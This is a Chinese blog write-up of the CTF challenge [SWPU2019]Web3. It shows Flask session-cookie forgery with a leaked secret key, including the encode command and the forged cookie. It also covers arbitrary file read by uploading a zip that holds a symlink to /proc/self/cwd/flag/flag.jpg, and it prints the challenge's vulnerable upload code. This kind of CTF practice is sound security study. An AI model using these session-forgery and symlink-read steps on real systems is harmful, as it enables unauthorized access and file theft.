[SWPU2019]Web3

最新推荐文章于 2024-03-10 18:00:15 发布
最新推荐文章于 2024-03-10 18:00:15 发布
阅读量534 收藏
点赞数
分类专栏: BUUCTF 文章标签: 基础练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/127784218
版权 
知识点:利用 404 页面获取密钥,利用 ln -s 建立软连接,利用 proc 文件系统。

flask-session 伪造

测试发现 upload 页面需要权限,那么首先查看 cookie,发现格式很像 jwt 或者 flask-session。
在这里插入图片描述
利用 p 神的 flask-session 解密脚本。
在这里插入图片描述
尝试修改 id 为 1 登录,但要修改还需要 key,这边我找了半天没找到,看了 大佬们的 wp,学到了一种新姿势,利用 404 页面,获取key 。
在这里插入图片描述
最后利用加密脚本加密一下。

在这里插入图片描述
payload:

python .\flask_session3.py encode -s 'keyqqqwwweee!@#$%^&*' -t "{'id': b'1', 'is_login': True, 'password': 'admin', 'username': 'admin'}"

.eJyrVspMUbKqVlJIUrJS8g20tVWq1VHKLI7PyU_PzFOyKikqTdVRKkgsLi7PLwIqVEpMyQWK6yiVFqcW5SXmpsKFagFiyxgX.Y2xeVw.2vWtNNN_VVZwcUAcM-XcoL8v884

软连接获取 flag

在网页源码中给出了 flask 的一部分源码。

@app.route('/upload',methods=['GET','POST'])
def upload():
    if session['id'] != b'1':
        return render_template_string(temp)
    if request.method=='POST':
        m = hashlib.md5()
        name = session['password']
        name = name+'qweqweqwe'
        name = name.encode(encoding='utf-8')
        m.update(name)
        md5_one= m.hexdigest()
        n = hashlib.md5()
        ip = request.remote_addr
        ip = ip.encode(encoding='utf-8')
        n.update(ip)
        md5_ip = n.hexdigest()
        f=request.files['file']
        basepath=os.path.dirname(os.path.realpath(__file__))
        path = basepath+'/upload/'+md5_ip+'/'+md5_one+'/'+session['username']+"/"
        path_base = basepath+'/upload/'+md5_ip+'/'
        filename = f.filename
        pathname = path+filename
        if "zip" != filename.split('.')[-1]:
            return 'zip only allowed'
        if not os.path.exists(path_base):
            try:
                os.makedirs(path_base)
            except Exception as e:
                return 'error'
        if not os.path.exists(path):
            try:
                os.makedirs(path)
            except Exception as e:
                return 'error'
        if not os.path.exists(pathname):
            try:
                f.save(pathname)
            except Exception as e:
                return 'error'
        try:
            cmd = "unzip -n -d "+path+" "+ pathname
            if cmd.find('|') != -1 or cmd.find(';') != -1:
				waf()
                return 'error'
            os.system(cmd)
        except Exception as e:
            return 'error'
        unzip_file = zipfile.ZipFile(pathname,'r')
        unzip_filename = unzip_file.namelist()[0]
        if session['is_login'] != True:
            return 'not login'
        try:
            if unzip_filename.find('/') != -1:
                shutil.rmtree(path_base)
                os.mkdir(path_base)
                return 'error'
            image = open(path+unzip_filename, "rb").read()
            resp = make_response(image)
            resp.headers['Content-Type'] = 'image/png'
            return resp
        except Exception as e:
            shutil.rmtree(path_base)
            os.mkdir(path_base)
            return 'error'
    return render_template('upload.html')


@app.route('/showflag')
def showflag():
    if True == False:
        image = open(os.path.join('./flag/flag.jpg'), "rb").read()
        resp = make_response(image)
        resp.headers['Content-Type'] = 'image/png'
        return resp
    else:
        return "can't give you"

/showflag 路由中可以看出 flag 在 /flag/flag.jpg 中,但是绝对路径不知道,可以通过 /proc/self/cwd/flag/flag,jpg 软连接读取。

/upload 路由检测上传的文件是不是 zip 后缀的文件,如果是则解压,并且读取里面的文件内容并且返回到 upload.html。

这边又学到一个姿势:
利用 ln -s /proc/self/cwd/flag/flag.jpg succ 建立一个软连接到 succ,也就是创建了一个快捷键,名字叫 succ。

然后利用 zip -ry succ.zip succ 打包这个软连接

-r:将指定的目录下的所有子目录以及文件一起处理

-y:直接保存符号连接,而非该连接所指向的文件,本参数仅在UNIX之类的系统下有效。

最后抓包上传就可以拿到 flag 了。
在这里插入图片描述

reference

https://blog.csdn.net/SopRomeo/article/details/108334393
succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SWPU2019]Web6
lllffg的博客
03-16 731
[SWPU2019]Web6 SQL注入中的with rollup 利用session.upload_progress进行文件包含和反序列化渗透 一个登陆页面,尝试一下1’ and sleep(4)#后弹出被过滤的回显,然后怎么都没思路,然后输入了下万能密码1’ or 1=1 or ‘1’='1,回显了passwd错误,这证明只对passwd进行的检测 看了下wp 猜测源码太狠了 $sql="select * from users where username='$name' and passwd='$
[BUUCTF][SWPU2019]Web1
朋克归零膏的博客
10-28 572
无列名注入fuzz过滤词绕过空格。
BUUCTF [SWPU2019] Web3
Senimo
12-20 829
BUUCTF [SWPU2019] Web3 考点: 启动环境: 首先是一个登陆页面,标题为:CTF-Flask-Demo,推测其应为Flask所编写,尝试使用admin用户登陆: 用户名:admin、密码:admin,登陆成功: 又尝试了几个登陆密码,应该是没有验证,随便登陆 其中有文件上传功能,点击upload: 提示权限不足,考虑其为session判断权限,使用BurpSuite查看页面Cookie信息: 注:在Flask中,session是保存在Cookie中,也就是本地,所以可以直接读取其内
BUUCTF:[SWPU2019]Web3
末初的CSDN博客
04-21 1572
参考:https://www.leavesongs.com/PENETRATION/client-session-security.html http://forever404.cn/2019/12/14/SWPU2019web%E5%A4%8D%E7%8E%B0/ 点击upload有权限设置,猜测cookie伪造 权限不够,查看session 使用P师傅的脚本可以解这个session...
[SWPU2019]Web3 ----不会编程的崽
不会编程的崽的博客
03-10 1248
flask框架的session问题 文件上传 软链接读取
BUUCTF--[SWPU2019]Web3
qq_46263951的博客
08-07 345
进入后是一个登录页面,本以为要秀一番操作,这里直接随便输入即可登录进去 登录进去后只有一个upload按钮,点击后给出提示Permission denied!,这里猜测是要伪造Session 找到session,将session的值进行分析 使用大佬的脚本可以解这个session #!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import sess.
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
swpu前端实验4的实验
04-23
课程:Web前端应用开发实验 项目:jQuery基础应用 成绩: 专业班级: 班内序号: 指导教师:杨云 姓名: 学号: 实验日期: 实验目的及要求: 1. 掌握jQuery页面初始化方法:在网页加载完成后执行特定的操作,如...
毕设&课设&项目&实训-SWPU数据库原理及应用大作业《西柚外卖订餐系统》基于Python+Flask+MySQL开发.zip
02-10
毕设&课设&项目&实训-本项目为SWPU数据库原理及应用大作业《西柚外卖订餐系统》,基于Python+Flask+MySQL开发 【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发...
毕设&课程作业_SWPU数据库原理及应用大作业《西柚外卖订餐系统》,基于Python+Flask+MySQL开发.zip
01-22
3. 订单创建:用户将菜品添加到购物车,生成订单,需要处理订单数量、总价计算等逻辑。 4. 支付处理:虽然描述中未明确提及支付功能,但一个完整的订餐系统通常会包含支付接口,可以是模拟支付或集成第三方支付平台...
BUUCTF web3
qq_61768489的博客
05-16 1004
[WUSTCTF2020]朴实无华 这题主要就是绕过php特性 , 访问假flag页面 ,响应头里有文件提示 访问后得到源码,这里怎么乱码了 逐个击破 if(intval($num)<2020&&intval($num+1)>2021) 这里使用e科学计数法, $num=123e3 intval($num)解析出来是123 满足<2020 intval($num+1) 解析出来是 123e3+1 满足...
[SWPU2019]Web1
as you know, nlp is fantasitc!
04-16 698
写在前面:这道题练习的是无列名注入,一步一步进行构造即可 1、通过测试(这个要自己找,不断的测试),广告名有sql二次注入(存入特殊广告名,查询的时候会报错) 2、闭合语句 因为过滤 -- # or 空格,尝试去闭合语句,构造语句 '/**/||/**/'1'='1 3、尝试联合注入,先要找到多少列 1、#order by 中的or被过滤了,因此不能用 2、'/**/group/**/by/**/22,' #group by根据一个或多个列对结果集进行分组 '/**/union/**/select/
2019swpuj2ee作业3
weixin_30415801的博客
03-12 102
静态页面:   在网站设计中,纯粹html格式的网页通常被称为“静态网页”,早期的网站一般都是由静态网页制作的。静态网页是相对于动态网页而言,是指没有后台数据库、不含程序和不可交互的网页。你编的是什么它显示的就是什么、不会有任何改变。静态网页相对更新起来比较麻烦,适用于一般更新较少的展示型网站。但是静态页面也可以出现动态的效果。只是它是不进行交互的。 动态页面:   动态网页是指网页文件...
VB+ACCESS宾馆客房管理系统(系统+论文+封面).zip
最新发布
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
Swpu19年web前端开发
04-24
Web前端开发领域有许多新技术和趋势,其中一些包括React,Vue.js,Angular,GraphQL,TypeScript,WebAssembly和PWA等。这些技术和趋势可以帮助开发人员更高效地构建可扩展的Web应用程序,并提高用户体验。另外,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值